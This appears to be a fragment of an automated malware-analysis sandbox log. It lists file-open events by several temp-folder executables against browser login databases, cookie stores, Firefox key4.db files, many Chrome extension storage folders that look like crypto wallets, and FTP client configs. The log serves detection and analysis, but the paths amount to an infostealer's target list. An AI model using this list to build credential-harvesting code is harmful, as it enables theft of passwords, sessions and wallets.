                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
